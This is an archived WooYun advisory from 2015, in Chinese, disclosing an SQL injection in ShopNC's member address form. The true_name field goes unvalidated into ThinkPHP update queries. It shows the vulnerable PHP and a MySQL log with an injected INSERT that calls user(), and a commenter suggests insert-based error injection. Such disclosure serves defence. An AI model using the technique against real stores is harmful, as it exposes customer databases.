当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0143429

漏洞标题:shopnc sql注入漏洞

相关厂商:shopnc.net

漏洞作者: pang0lin

提交时间:2015-10-10 13:40

修复时间:2016-01-13 13:43

公开时间:2016-01-13 13:43

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-10-10: 细节已通知厂商并且等待厂商处理中
2015-10-15: 厂商主动忽略漏洞,细节向第三方安全合作伙伴开放(绿盟科技唐朝安全巡航
2015-12-09: 细节向核心白帽子及相关领域专家公开
2015-12-19: 细节向普通白帽子公开
2015-12-29: 细节向实习白帽子公开
2016-01-13: 细节向公众公开

简要描述:

shopnc注入漏洞

详细说明:

其实这与其怪罪于shopnc,还不如说是thinkphp框架的问题,只是shopnc自己没有与时俱进,不知道现在thinkphp框架已经有很多问题了。
1.首先定位到漏洞代码shop/control/member_address.php文件

if (chksubmit()){
			/**
			 * 验证表单信息
			 */
			$obj_validate = new Validate();
			$obj_validate->validateparam = array(
				array("input"=>$_POST["true_name"],"require"=>"true","message"=>$lang['member_address_receiver_null']),
				array("input"=>$_POST["area_id"],"require"=>"true","validator"=>"Number","message"=>$lang['member_address_wrong_area']),
				array("input"=>$_POST["city_id"],"require"=>"true","validator"=>"Number","message"=>$lang['member_address_wrong_area']),
				array("input"=>$_POST["area_info"],"require"=>"true","message"=>$lang['member_address_area_null']),
				array("input"=>$_POST["address"],"require"=>"true","message"=>$lang['member_address_address_null']),
				array("input"=>$_POST['tel_phone'].$_POST['mob_phone'],'require'=>'true','message'=>$lang['member_address_phone_and_mobile'])
			);
			$error = $obj_validate->validate();
			if ($error != ''){
				showValidateError($error);
            }
            $data = array();
			$data['member_id'] = $_SESSION['member_id'];
			$data['true_name'] = $_POST['true_name'];
			$data['area_id'] = intval($_POST['area_id']);
			$data['city_id'] = intval($_POST['city_id']);
			$data['area_info'] = $_POST['area_info'];
			$data['address'] = $_POST['address'];
			$data['tel_phone'] = $_POST['tel_phone'];
			$data['mob_phone'] = $_POST['mob_phone'];
			$data['is_default'] = $_POST['is_default'] ? 1 : 0;
			if ($_POST['is_default']) {
			    $address_class->editAddress(array('is_default'=>0),array('member_id'=>$_SESSION['member_id'],'is_default'=>1));//继续跟踪
			}
 
			if (intval($_POST['id']) > 0){
                $rs = $address_class->editAddress($data, array('address_id' => $_POST['id']));
				if (!$rs){
					showDialog($lang['member_address_modify_fail'],'','error');
				}
			}


2.继续跟踪editAddress函数。

public function editAddress($update, $condition){
        return $this->where($condition)->update($update);
	}


3.该函数直接调用了thinkphp的where和update函数来执行代码,然后传入的参数中$_POST[‘true_name’]只验证了是否存在,而没有字符串有效性的判断。所以我们可以利用thinkphp本身的缺陷,构造payload。
首先添加一个地址。

4.png


然后使用burp进行抓包,修改其中的true_name字段为,见测试代码

3.png


然后再查看我们的收货地址。

2.png


4.我们去看一下mysql的日志文件

150925 10:36:39	  232 Connect	root@localhost on 33hao
		  232 Query	SET CHARACTER_SET_CLIENT = utf8,
		                 CHARACTER_SET_CONNECTION = utf8,
		                 CHARACTER_SET_DATABASE = utf8,
		                 CHARACTER_SET_RESULTS = utf8,
		                 CHARACTER_SET_SERVER = utf8,
		                 COLLATION_CONNECTION = utf8_general_ci,
		                 COLLATION_DATABASE = utf8_general_ci,
		                 COLLATION_SERVER = utf8_general_ci,
		                 sql_mode=''
		  232 Query	SELECT * FROM `33hao`.`33hao_member` WHERE ( member_id = '1' ) LIMIT 1
		  232 Query	SELECT COUNT(*) AS nc_count FROM `33hao`.`33hao_address` WHERE ( member_id = '1' ) LIMIT 1
		  232 Query	INSERT  INTO `33hao`.`33hao_address` (member_id,true_name,area_id,city_id,area_info,address,tel_phone,mob_phone,is_default) VALUES ('1',1,1,1,1,user(),1,1,1) -- a,'38','36','北京	北京市	西城区','awddsad','13800000000','13800000000','0')


漏洞证明:

2.png

修复方案:

过滤

版权声明:转载请注明来源 pang0lin@乌云

漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2016-01-13 13:43

厂商回复:

漏洞Rank:4 (WooYun评价)

最新状态:

暂无

漏洞评价:

评价

  1. 2015-12-23 14:56 | BeenQuiver ( 普通白帽子 | Rank:103 漏洞数:27 | 专注而高效,坚持好的习惯千万不要放弃)

    可以利用insert报错注入